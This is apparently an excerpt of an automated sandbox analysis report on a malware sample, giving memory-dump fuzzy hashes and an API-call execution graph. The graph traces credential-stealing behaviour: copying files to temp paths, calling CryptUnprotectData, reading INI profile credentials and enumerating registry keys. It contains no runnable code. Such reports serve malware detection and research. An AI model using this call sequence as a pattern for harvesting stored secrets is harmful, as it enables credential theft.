                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                                              • Opcode ID: 656e7372d4808c4c5d7ea5b8592caa9c3e11ad9ac04be7c0b803d216e7407e21
                                                                                                                                                                                                                              • Instruction ID: 2408102c0d2838d1ee02f2301670e8db5c78df46adacc48efcdc3e2922523996
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 656e7372d4808c4c5d7ea5b8592caa9c3e11ad9ac04be7c0b803d216e7407e21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AE0D8342005048FC601F7EAE540F5AB7E5EF88309B004468E1098B378DF72AC4BABC0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 8887493750647230e352bdfae37c3b96fee745e05477239d1527d1d111cdf419
                                                                                                                                                                                                                              • Instruction ID: 65f3a312b2b14591a0907c23eb7bb6e49a0b02d7d05efa63bb3099abbe6bc4d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8887493750647230e352bdfae37c3b96fee745e05477239d1527d1d111cdf419
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D811F31A002048FDB11EBB9D954B9EB7F2EF88304F14856AD40997365EF75AD8BCB81
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b8721bef41a9b34aaea4ef971dbbb9942703bf32cf0912f3522b9466be6f38ec
                                                                                                                                                                                                                              • Instruction ID: 26067bfcef13da0eceb8eba1ed621606d4fed62d0b40423590bef90acc5f8c37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8721bef41a9b34aaea4ef971dbbb9942703bf32cf0912f3522b9466be6f38ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841F030E002059FDB15EBB9C558A9EB7F6AFC8704F10853AD405E3365DF759C868B81
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c5b5561e028ffd053e7665a1b4b69ff04c05eeb3cdebd4546f1c93f657d962a3
                                                                                                                                                                                                                              • Instruction ID: 298e59f55ffe6f0000dd35ad651b945e1782c67861baf9b78335db6c31d644e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5b5561e028ffd053e7665a1b4b69ff04c05eeb3cdebd4546f1c93f657d962a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6217F30B002058FEF14ABB9C65875DB7E2AF88709F104479D809D7365DF75DC868B91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 37c6ada6cefcd1391b66ff2d318f7dcbf5f704fdcacf596a496596359608077d
                                                                                                                                                                                                                              • Instruction ID: 16daec5f7de82fa9cfc682b36bf03d1f428e23b65448d5097b5ec914e339f1af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37c6ada6cefcd1391b66ff2d318f7dcbf5f704fdcacf596a496596359608077d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF09679644780AFCB02ABB5F884DA47FB1EF0A32571501D6E448CB336C762DC9ADB41
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2402685785.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_ae0000_djvbaae.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a311e82d8a005e78040f032c557c6f1237aca64db266a1136252ed4c4416e0e7
                                                                                                                                                                                                                              • Instruction ID: f0db55cd9bfcbe845742c274412db6f2647771cc036a25936e602af20c1f53a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a311e82d8a005e78040f032c557c6f1237aca64db266a1136252ed4c4416e0e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5E0EC755083C0AFCB129F74E4988A47F71AF1B22531904D9D8858B337C622989ADB11

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:3.5%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:50.8%
                                                                                                                                                                                                                              Signature Coverage:21.6%
                                                                                                                                                                                                                              Total number of Nodes:783
                                                                                                                                                                                                                              Total number of Limit Nodes:72
                                                                                                                                                                                                                              execution_graph 29055 2d8c6da 23 API calls 29164 2d970de 24 API calls 29169 2db34ca 57 API calls 29058 2d8faca _allmul strcspn 29170 2d65cc5 22 API calls 29173 2d75cca 32 API calls 29174 2d66eb7 22 API calls 29175 2d64cf5 memset 28981 2d628f8 28982 2d62900 28981->28982 28983 2d62ac8 28981->28983 29013 2d61000 GetProcessHeap RtlAllocateHeap 28982->29013 28984 2db3848 76 API calls 28983->28984 28986 2d62ad1 DeleteFileW 28984->28986 28988 2d61011 3 API calls 28986->28988 28987 2d6290e 29014 2d802ec 107 API calls 28987->29014 28990 2d62adf 28988->28990 28992 2d62a98 lstrlen 28993 2d62aa4 28992->28993 28994 2d62ac1 28992->28994 29019 2d61798 lstrlen 28993->29019 28997 2d61011 3 API calls 28994->28997 28995 2d61fa7 19 API calls 29007 2d62919 28995->29007 28997->28983 28998 2d62ab1 29020 2d61798 lstrlen 28998->29020 29000 2d62ab9 29021 2d61798 lstrlen 29000->29021 29002 2d629da lstrlen 29003 2d629eb lstrlen 29002->29003 29002->29007 29003->29007 29006 2d62a8b 29018 2d7fb92 93 API calls 29006->29018 29007->28995 29007->29002 29007->29006 29015 2d61000 GetProcessHeap RtlAllocateHeap 29007->29015 29016 2d62112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 29007->29016 29017 2d802ec 107 API calls 29007->29017 29009 2d62a25 wsprintfA lstrlen 29010 2d62a6a lstrcat 29009->29010 29011 2d62a58 29009->29011 29012 2d61011 3 API calls 29010->29012 29011->29010 29012->29007 29013->28987 29014->29007 29015->29007 29016->29009 29017->29007 29018->28992 29019->28998 29020->29000 29021->28994 29064 2d99ef6 125 API calls 29177 2d6f4ec 20 API calls 29048 2d69ee8 29049 2d69ef1 RtlFreeHeap 29048->29049 29050 2d69f1a 29048->29050 29049->29050 29051 2d69f02 29049->29051 29053 2d67f70 17 API calls 29051->29053 29053->29050 29181 2da2c9e 115 API calls 29070 2d6629a 23 API calls 28743 2d63098 28744 2d61b6a 2 API calls 28743->28744 28746 2d630af 28744->28746 28745 2d633a9 28746->28745 28767 2d61000 GetProcessHeap RtlAllocateHeap 28746->28767 28748 2d630ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28749 2db4bec 89 API calls 28748->28749 28752 2d63126 28749->28752 28750 2d6339b DeleteFileW 28751 2d61011 3 API calls 28750->28751 28751->28745 28752->28750 28753 2d63392 28752->28753 28768 2d802ec 107 API calls 28752->28768 28755 2db3848 76 API calls 28753->28755 28755->28750 28756 2d63381 28771 2d7fb92 93 API calls 28756->28771 28759 2d6319c RtlCompareMemory 28760 2d632cd CryptUnprotectData 28759->28760 28765 2d63155 28759->28765 28760->28765 28761 2d61fa7 19 API calls 28761->28765 28762 2d631d0 RtlZeroMemory 28769 2d61000 GetProcessHeap RtlAllocateHeap 28762->28769 28764 2d61011 3 API calls 28764->28765 28765->28756 28765->28759 28765->28760 28765->28761 28765->28762 28765->28764 28766 2d61798 lstrlen 28765->28766 28770 2d802ec 107 API calls 28765->28770 28766->28765 28767->28748 28768->28765 28769->28765 28770->28765 28771->28753 29071 2d76698 30 API calls 29073 2d70284 39 API calls 29184 2da348f 27 API calls 28911 2d62cb5 28912 2d62cbe 28911->28912 28913 2d61953 6 API calls 28912->28913 28914 2d62cc3 28913->28914 28915 2d62e17 28914->28915 28916 2d61953 6 API calls 28914->28916 28917 2d62cd9 28916->28917 28940 2d61000 GetProcessHeap RtlAllocateHeap 28917->28940 28919 2d62ce9 28941 2d61000 GetProcessHeap RtlAllocateHeap 28919->28941 28921 2d62cf9 28922 2d61b6a 2 API calls 28921->28922 28923 2d62d04 28922->28923 28924 2d62d0c GetPrivateProfileSectionNamesW 28923->28924 28925 2d62ded 28923->28925 28924->28925 28938 2d62d22 28924->28938 28926 2d61011 3 API calls 28925->28926 28927 2d62e02 28926->28927 28928 2d61011 3 API calls 28927->28928 28930 2d62e09 28928->28930 28929 2d62d3f StrStrIW 28931 2d62dd7 lstrlenW 28929->28931 28932 2d62d53 GetPrivateProfileStringW 28929->28932 28933 2d61011 3 API calls 28930->28933 28931->28925 28931->28938 28932->28931 28934 2d62d72 GetPrivateProfileIntW 28932->28934 28935 2d62e10 28933->28935 28934->28938 28936 2d61011 3 API calls 28935->28936 28936->28915 28937 2d61953 6 API calls 28937->28938 28938->28925 28938->28929 28938->28931 28938->28937 28939 2d61011 3 API calls 28938->28939 28939->28938 28940->28919 28941->28921 29077 2d812bb _allmul _allmul _allmul _alldvrm _allmul 29189 2d66eb7 24 API calls 29190 2d648b1 22 API calls 29079 2d696bc _alldiv _alldiv _alldiv _alldiv _allmul 29191 2d778b9 33 API calls 29022 2d69ea7 RtlAllocateHeap 29023 2d69ec1 29022->29023 29024 2d69ed9 29022->29024 29026 2d67f70 17 API calls 29023->29026 29026->29024 29192 2d7b8a6 90 API calls 29027 2d624a4 29030 2d62198 RtlZeroMemory GetVersionExW 29027->29030 29031 2d621cb LoadLibraryW 29030->29031 29033 2d621fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29031->29033 29034 2d6249b 29031->29034 29035 2d62492 FreeLibrary 29033->29035 29040 2d62244 29033->29040 29035->29034 29036 2d6247b 29036->29035 29037 2d62365 RtlCompareMemory 29037->29040 29038 2d622e1 RtlCompareMemory 29038->29040 29039 2d61953 6 API calls 29039->29040 29040->29035 29040->29036 29040->29037 29040->29038 29040->29039 29041 2d61011 GetProcessHeap RtlFreeHeap VirtualQuery 29040->29041 29042 2d623f8 StrStrIW 29040->29042 29043 2d617c0 9 API calls 29040->29043 29041->29040 29042->29040 29043->29040 29047 2d62ea5 25 API calls 29082 2d656a2 _allrem 29193 2d7b0aa 84 API calls 29194 2d87ca6 19 API calls 29195 2da7452 19 API calls 28695 2d6105d VirtualFree 29085 2d65e5a 28 API calls 28824 2d63c40 28825 2d61b6a 2 API calls 28824->28825 28826 2d63c50 28825->28826 28827 2d63dfa 28826->28827 28860 2d61000 GetProcessHeap RtlAllocateHeap 28826->28860 28829 2d63c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28830 2db4bec 89 API calls 28829->28830 28833 2d63c9a 28830->28833 28831 2d63dec DeleteFileW 28832 2d61011 3 API calls 28831->28832 28832->28827 28833->28831 28834 2d63de3 28833->28834 28861 2d61000 GetProcessHeap RtlAllocateHeap 28833->28861 28835 2db3848 76 API calls 28834->28835 28835->28831 28837 2d63cce 28862 2d802ec 107 API calls 28837->28862 28839 2d63da8 28865 2d7fb92 93 API calls 28839->28865 28841 2d63db1 lstrlen 28842 2d63ddc 28841->28842 28843 2d63db9 28841->28843 28844 2d61011 3 API calls 28842->28844 28866 2d61798 lstrlen 28843->28866 28844->28834 28845 2d61fa7 19 API calls 28853 2d63cd9 28845->28853 28847 2d63dc8 28867 2d61798 lstrlen 28847->28867 28848 2d63d2b lstrlen 28850 2d63d35 lstrlen 28848->28850 28848->28853 28850->28853 28851 2d63dd2 28868 2d61798 lstrlen 28851->28868 28853->28839 28853->28845 28853->28848 28863 2d61000 GetProcessHeap RtlAllocateHeap 28853->28863 28864 2d802ec 107 API calls 28853->28864 28856 2d63d46 wsprintfA lstrlen 28857 2d63d83 lstrcat 28856->28857 28858 2d63d71 28856->28858 28859 2d61011 3 API calls 28857->28859 28858->28857 28859->28853 28860->28829 28861->28837 28862->28853 28863->28856 28864->28853 28865->28841 28866->28847 28867->28851 28868->28842 29198 2d64440 24 API calls 29199 2d86440 107 API calls 29089 2dc9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 29203 2db507d 24 API calls 29091 2d80670 _allmul _allmul _allmul _alldvrm 29092 2d86e71 21 API calls 29204 2d86871 8 API calls 29205 2d7807c 23 API calls 29209 2d6b079 20 API calls 29094 2d93e6b 20 API calls 29212 2d64c6d 17 API calls 29213 2d7f86a 31 API calls 29214 2da2864 25 API calls 29098 2d8f21c 23 API calls 29216 2d6581f _alldiv _allrem _allmul 28791 2d64406 28796 2d62e30 StrStrIW 28791->28796 28794 2d62e30 22 API calls 28795 2d6443a 28794->28795 28797 2d62e57 28796->28797 28798 2d62ebc 28796->28798 28800 2d619e5 9 API calls 28797->28800 28822 2d61000 GetProcessHeap RtlAllocateHeap 28798->28822 28802 2d62e68 28800->28802 28801 2d62ed0 RegOpenKeyExW 28803 2d62f68 28801->28803 28814 2d62eee 28801->28814 28802->28798 28823 2d61bc5 10 API calls 28802->28823 28806 2d61011 3 API calls 28803->28806 28805 2d62f50 RegEnumKeyExW 28808 2d62f5e RegCloseKey 28805->28808 28805->28814 28809 2d62f6f 28806->28809 28807 2d62e75 28810 2d62eb5 28807->28810 28813 2d61afe 10 API calls 28807->28813 28808->28803 28809->28794 28812 2d61011 3 API calls 28810->28812 28811 2d61953 6 API calls 28811->28814 28812->28798 28815 2d62e83 28813->28815 28814->28805 28814->28811 28816 2d6199d 9 API calls 28814->28816 28818 2d62e30 18 API calls 28814->28818 28821 2d61011 3 API calls 28814->28821 28817 2d6199d 9 API calls 28815->28817 28820 2d62e91 28815->28820 28816->28814 28817->28820 28818->28814 28819 2d61011 3 API calls 28819->28810 28820->28819 28821->28814 28822->28801 28823->28807 29101 2d80e0c 22 API calls 29102 2d6ca01 _allmul _alldiv _allmul _alldiv 28878 2d6a40e 28881 2d6a426 28878->28881 28888 2d6a4a2 28878->28888 28879 2d6a469 memcpy 28879->28888 28880 2d6a4cc ReadFile 28883 2d6a524 28880->28883 28880->28888 28881->28879 28882 2d6a44a memcpy 28881->28882 28881->28888 28884 2d6a45d 28882->28884 28892 2d6a2aa 17 API calls 28883->28892 28886 2d6a532 28886->28884 28887 2d6a53e memset 28886->28887 28887->28884 28888->28880 28888->28883 28889 2d6a501 28888->28889 28891 2d6a1c6 18 API calls 28889->28891 28891->28884 28892->28886 29220 2d99000 28 API calls 29222 2da5401 memset memcpy memcpy memset memcpy 28942 2d6f433 28943 2d6f445 28942->28943 28948 2d723b9 28943->28948 28946 2d6f47c 28947 2d6f490 28946->28947 28956 2d6e206 58 API calls 28946->28956 28949 2d723d3 28948->28949 28952 2d72473 28948->28952 28951 2d72431 28949->28951 28960 2d73451 43 API calls 28949->28960 28951->28952 28957 2d663f7 28951->28957 28952->28946 28954 2d7240f 28954->28951 28961 2d7235a 17 API calls 28954->28961 28956->28947 28959 2d6bafc 20 API calls 28957->28959 28958 2d66400 28958->28952 28959->28958 28960->28954 28961->28951 29228 2d7943d 34 API calls 29234 2d9e024 93 API calls 29235 2d6482b 14 API calls 28687 2d663dd 28689 2d6b87b 21 API calls 28687->28689 28688 2d663f4 28689->28688 28696 2d615dd 28697 2d615f3 lstrlen 28696->28697 28698 2d61600 28696->28698 28697->28698 28707 2d61000 GetProcessHeap RtlAllocateHeap 28698->28707 28700 2d61608 lstrcat 28701 2d61644 28700->28701 28702 2d6163d lstrcat 28700->28702 28708 2d61333 28701->28708 28702->28701 28705 2d61011 3 API calls 28706 2d61667 28705->28706 28707->28700 28731 2d61000 GetProcessHeap RtlAllocateHeap 28708->28731 28710 2d61357 28732 2d6106c lstrlen MultiByteToWideChar 28710->28732 28712 2d61366 28733 2d612a3 RtlZeroMemory 28712->28733 28715 2d613b8 RtlZeroMemory 28719 2d613ed 28715->28719 28716 2d61011 3 API calls 28717 2d615d2 28716->28717 28717->28705 28718 2d615b5 28718->28716 28719->28718 28735 2d61000 GetProcessHeap RtlAllocateHeap 28719->28735 28721 2d614a7 wsprintfW 28722 2d614c9 28721->28722 28730 2d615a1 28722->28730 28736 2d61000 GetProcessHeap RtlAllocateHeap 28722->28736 28723 2d61011 3 API calls 28723->28718 28725 2d61533 28726 2d6159a 28725->28726 28737 2d6104c VirtualAlloc 28725->28737 28728 2d61011 3 API calls 28726->28728 28728->28730 28729 2d6158a RtlMoveMemory 28729->28726 28730->28723 28731->28710 28732->28712 28734 2d612c5 28733->28734 28734->28715 28734->28718 28735->28721 28736->28725 28737->28729 28772 2d643d9 28779 2d64317 _alloca_probe RegOpenKeyW 28772->28779 28775 2d64317 25 API calls 28776 2d643f5 28775->28776 28777 2d64317 25 API calls 28776->28777 28778 2d64403 28777->28778 28780 2d64343 RegEnumKeyExW 28779->28780 28781 2d643cf 28779->28781 28782 2d643c4 RegCloseKey 28780->28782 28786 2d6436d 28780->28786 28781->28775 28782->28781 28783 2d61953 6 API calls 28783->28786 28784 2d6199d 9 API calls 28784->28786 28786->28783 28786->28784 28787 2d61011 3 API calls 28786->28787 28790 2d6418a 16 API calls 28786->28790 28788 2d6439b RegEnumKeyExW 28787->28788 28788->28786 28789 2d643c3 28788->28789 28789->28782 28790->28786 29110 2d6ebd9 37 API calls 29111 2d813ca 103 API calls 29237 2db3dc8 24 API calls 29116 2d973c4 22 API calls 28893 2d69fc8 28895 2d69fd8 28893->28895 28896 2d69fd3 28893->28896 28894 2d69ff4 HeapCreate 28894->28896 28897 2d6a004 28894->28897 28895->28894 28895->28896 28899 2d67f70 17 API calls 28897->28899 28899->28896 29238 2d6d1f7 memset _allmul _allmul 29118 2d79ff0 32 API calls 29239 2d649f1 13 API calls 28965 2d647fa 28972 2d6479c 28965->28972 28968 2d6479c 23 API calls 28969 2d64813 28968->28969 28970 2d6479c 23 API calls 28969->28970 28971 2d6481f 28970->28971 28973 2d61afe 10 API calls 28972->28973 28974 2d647af 28973->28974 28975 2d647f1 28974->28975 28976 2d6199d 9 API calls 28974->28976 28975->28968 28980 2d647bf 28976->28980 28977 2d647ea 28978 2d61011 3 API calls 28977->28978 28978->28975 28979 2d61d4a 18 API calls 28979->28980 28980->28977 28980->28979 29120 2d813ca 102 API calls 29240 2db55eb IsProcessorFeaturePresent 29242 2d699e1 strncmp 29243 2d6c9ea _allmul _alldiv 29245 2d7fd97 19 API calls 29125 2d7cb91 18 API calls 28527 2d6639e 28531 2d6b1e5 28527->28531 28551 2d6b1e3 28527->28551 28528 2d663b2 28532 2d6b214 28531->28532 28533 2d6b20d 28531->28533 28535 2d6b233 28532->28535 28537 2d6b28f 28532->28537 28605 2d6ae65 28532->28605 28587 2d6aeea 28533->28587 28535->28537 28571 2d6a7ae 28535->28571 28537->28528 28539 2d6b26d 28611 2d6a1c6 18 API calls 28539->28611 28540 2d6b2d6 28584 2d66a5a 28540->28584 28546 2d6b2e8 28546->28537 28547 2d6b310 CreateFileMappingW 28546->28547 28548 2d6b37e 28547->28548 28549 2d6b32b MapViewOfFile 28547->28549 28612 2d6a1c6 18 API calls 28548->28612 28549->28546 28549->28548 28552 2d6b1e5 28551->28552 28553 2d6b214 28552->28553 28554 2d6aeea 27 API calls 28552->28554 28555 2d6b233 28553->28555 28556 2d6ae65 22 API calls 28553->28556 28557 2d6b28f 28553->28557 28554->28553 28555->28557 28558 2d6a7ae 18 API calls 28555->28558 28556->28555 28557->28528 28560 2d6b267 28558->28560 28559 2d6b2d6 28561 2d66a5a 17 API calls 28559->28561 28560->28557 28560->28559 28563 2d6a67c 22 API calls 28560->28563 28566 2d6b26d 28560->28566 28564 2d6b2e8 28561->28564 28565 2d6b2be 28563->28565 28564->28557 28567 2d6b310 CreateFileMappingW 28564->28567 28565->28559 28565->28566 28685 2d6a1c6 18 API calls 28566->28685 28568 2d6b37e 28567->28568 28569 2d6b32b MapViewOfFile 28567->28569 28686 2d6a1c6 18 API calls 28568->28686 28569->28564 28569->28568 28573 2d6a7c7 28571->28573 28572 2d6a805 28572->28537 28572->28539 28572->28540 28575 2d6a67c 28572->28575 28573->28572 28613 2d6a1c6 18 API calls 28573->28613 28576 2d6a694 _alldiv _allmul 28575->28576 28577 2d6a6c1 28575->28577 28576->28577 28614 2d6a33b SetFilePointer 28577->28614 28580 2d6a6f0 SetEndOfFile 28581 2d6a6ee 28580->28581 28582 2d6a6d4 28580->28582 28581->28539 28581->28540 28582->28581 28618 2d6a1c6 18 API calls 28582->28618 28585 2db307c 17 API calls 28584->28585 28586 2d66a65 28585->28586 28586->28546 28620 2d66a81 28587->28620 28589 2d6af01 28590 2d66a81 memset 28589->28590 28597 2d6af07 28589->28597 28591 2d6af2a 28590->28591 28591->28597 28624 2d67f07 28591->28624 28594 2d6af54 28594->28597 28627 2db52ae 28594->28627 28597->28532 28598 2d6affa 28599 2d6b020 28598->28599 28600 2d6b000 28598->28600 28601 2d6ae65 22 API calls 28599->28601 28651 2d6a1c6 18 API calls 28600->28651 28603 2d6b01c 28601->28603 28603->28597 28646 2d6adcc 28603->28646 28607 2d6ae7a 28605->28607 28606 2d6ae83 28606->28535 28607->28606 28608 2d6a67c 22 API calls 28607->28608 28609 2d6aea5 28608->28609 28609->28606 28684 2d6a1c6 18 API calls 28609->28684 28611->28537 28612->28537 28613->28572 28615 2d6a36a 28614->28615 28617 2d6a390 28614->28617 28615->28617 28619 2d6a1c6 18 API calls 28615->28619 28617->28580 28617->28582 28618->28581 28619->28617 28621 2d66a8f 28620->28621 28622 2d66aa4 28621->28622 28623 2d66a95 memset 28621->28623 28622->28589 28623->28622 28652 2d67ec7 28624->28652 28628 2db52bb 28627->28628 28629 2d6afd9 28628->28629 28657 2d9ba08 _allmul 28628->28657 28631 2d6b87b 28629->28631 28632 2d6b88d memset 28631->28632 28639 2d6b8e5 28632->28639 28635 2d6ba3c 28635->28598 28636 2d6b965 CreateFileW 28636->28639 28639->28632 28639->28635 28639->28636 28640 2d6ba14 28639->28640 28641 2d6ba41 28639->28641 28658 2d6b609 28639->28658 28661 2d6b64b 18 API calls 28639->28661 28662 2d6bb9f 18 API calls 28639->28662 28663 2d6a2aa 17 API calls 28639->28663 28664 2d6a1c6 18 API calls 28640->28664 28645 2db52ae _allmul 28641->28645 28643 2d6ba32 28665 2db4db2 17 API calls 28643->28665 28645->28635 28647 2d6ade4 28646->28647 28648 2d6ae5f 28647->28648 28670 2d6bafc 28647->28670 28681 2d6a39e 18 API calls 28647->28681 28648->28597 28651->28603 28653 2d67ed4 28652->28653 28654 2d67ed9 28652->28654 28653->28594 28656 2d66e6a 17 API calls 28654->28656 28656->28653 28657->28629 28666 2d6a08a 28658->28666 28660 2d6b60f 28660->28639 28661->28639 28662->28639 28663->28639 28664->28643 28665->28635 28667 2d6a0a4 28666->28667 28668 2d6a0aa 28667->28668 28669 2d66a81 memset 28667->28669 28668->28660 28669->28668 28671 2d6b609 memset 28670->28671 28672 2d6bb14 28671->28672 28673 2d6bb3f GetFileAttributesW 28672->28673 28674 2d6bb1a 28672->28674 28675 2d6bb25 DeleteFileW 28672->28675 28677 2d6bb5b 28672->28677 28673->28672 28676 2d6bb4b 28673->28676 28674->28647 28675->28672 28679 2d6bb7d 28675->28679 28676->28677 28676->28679 28682 2d6a1c6 18 API calls 28677->28682 28683 2d6a2aa 17 API calls 28679->28683 28681->28647 28682->28674 28683->28674 28684->28606 28685->28557 28686->28557 28690 2d61b9d 28691 2d61ba2 28690->28691 28692 2d61bc1 28690->28692 28691->28692 28693 2d61ba9 GetFileAttributesW 28691->28693 28694 2d61bb5 28693->28694 29126 2d6bf9a _alldiv 29127 2d813ca 103 API calls 29247 2d61198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 29248 2d87d8b _allrem memcpy 29131 2d7ab8b 19 API calls 29249 2d89dbc 25 API calls 29133 2da33b7 27 API calls 29134 2da53ad memset memcpy memset memcpy 29251 2d711a0 43 API calls 29135 2d88ba6 7 API calls 29253 2d8e558 22 API calls 28375 2d64151 28378 2d64045 28375->28378 28397 2d63fdc 28378->28397 28381 2d63fdc 50 API calls 28382 2d6407a 28381->28382 28383 2d63fdc 50 API calls 28382->28383 28384 2d6408d 28383->28384 28385 2d63fdc 50 API calls 28384->28385 28386 2d640a0 28385->28386 28387 2d63fdc 50 API calls 28386->28387 28388 2d640b3 28387->28388 28389 2d63fdc 50 API calls 28388->28389 28390 2d640c6 28389->28390 28391 2d63fdc 50 API calls 28390->28391 28392 2d640d9 28391->28392 28393 2d63fdc 50 API calls 28392->28393 28394 2d640ec 28393->28394 28395 2d63fdc 50 API calls 28394->28395 28396 2d640ff 28395->28396 28408 2d61afe 28397->28408 28400 2d6403f 28400->28381 28401 2d6199d 9 API calls 28402 2d63ff8 28401->28402 28416 2d63ed9 28402->28416 28405 2d64038 28407 2d61011 3 API calls 28405->28407 28407->28400 28466 2d61000 GetProcessHeap RtlAllocateHeap 28408->28466 28410 2d61b0d SHGetFolderPathW 28411 2d61b63 28410->28411 28412 2d61b20 28410->28412 28411->28400 28411->28401 28413 2d61011 3 API calls 28412->28413 28414 2d61b28 28413->28414 28414->28411 28467 2d619e5 28414->28467 28417 2d63fd1 28416->28417 28418 2d63eed 28416->28418 28417->28405 28438 2d61d4a 28417->28438 28418->28417 28482 2d61000 GetProcessHeap RtlAllocateHeap 28418->28482 28420 2d63f01 PathCombineW FindFirstFileW 28421 2d63fca 28420->28421 28426 2d63f27 28420->28426 28424 2d61011 3 API calls 28421->28424 28422 2d63f32 lstrcmpiW 28425 2d63faf FindNextFileW 28422->28425 28427 2d63f42 lstrcmpiW 28422->28427 28423 2d63f78 lstrcmpiW 28423->28425 28423->28426 28424->28417 28425->28426 28430 2d63fc3 FindClose 28425->28430 28426->28422 28426->28423 28483 2d61000 GetProcessHeap RtlAllocateHeap 28426->28483 28427->28425 28428 2d63f56 28427->28428 28500 2d61000 GetProcessHeap RtlAllocateHeap 28428->28500 28430->28421 28432 2d63f92 PathCombineW 28484 2d63e04 28432->28484 28433 2d63f60 PathCombineW 28435 2d63ed9 23 API calls 28433->28435 28436 2d63f76 28435->28436 28437 2d61011 3 API calls 28436->28437 28437->28425 28439 2d61eb4 28438->28439 28440 2d61d62 28438->28440 28439->28405 28440->28439 28441 2d619b4 lstrlenW 28440->28441 28442 2d61d73 28441->28442 28443 2d61d8b 28442->28443 28444 2d61d79 28442->28444 28446 2d61953 6 API calls 28443->28446 28445 2d61953 6 API calls 28444->28445 28447 2d61d83 28445->28447 28446->28447 28447->28439 28448 2d61da3 FindFirstFileW 28447->28448 28449 2d61ead 28448->28449 28455 2d61dba 28448->28455 28450 2d61011 3 API calls 28449->28450 28450->28439 28451 2d61dc5 lstrcmpiW 28453 2d61e8e FindNextFileW 28451->28453 28454 2d61ddd lstrcmpiW 28451->28454 28452 2d61953 6 API calls 28452->28455 28453->28455 28456 2d61ea2 FindClose 28453->28456 28454->28453 28463 2d61df5 28454->28463 28455->28451 28455->28452 28457 2d6199d 9 API calls 28455->28457 28456->28449 28459 2d61e54 lstrcmpiW 28457->28459 28458 2d619b4 lstrlenW 28458->28463 28459->28463 28461 2d61011 3 API calls 28461->28453 28462 2d61953 6 API calls 28462->28463 28463->28458 28463->28461 28463->28462 28464 2d6199d 9 API calls 28463->28464 28465 2d61d4a 12 API calls 28463->28465 28526 2d61cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28463->28526 28464->28463 28465->28463 28466->28410 28468 2d619f7 28467->28468 28469 2d619fa RegOpenKeyExW 28467->28469 28468->28469 28470 2d61aa2 28469->28470 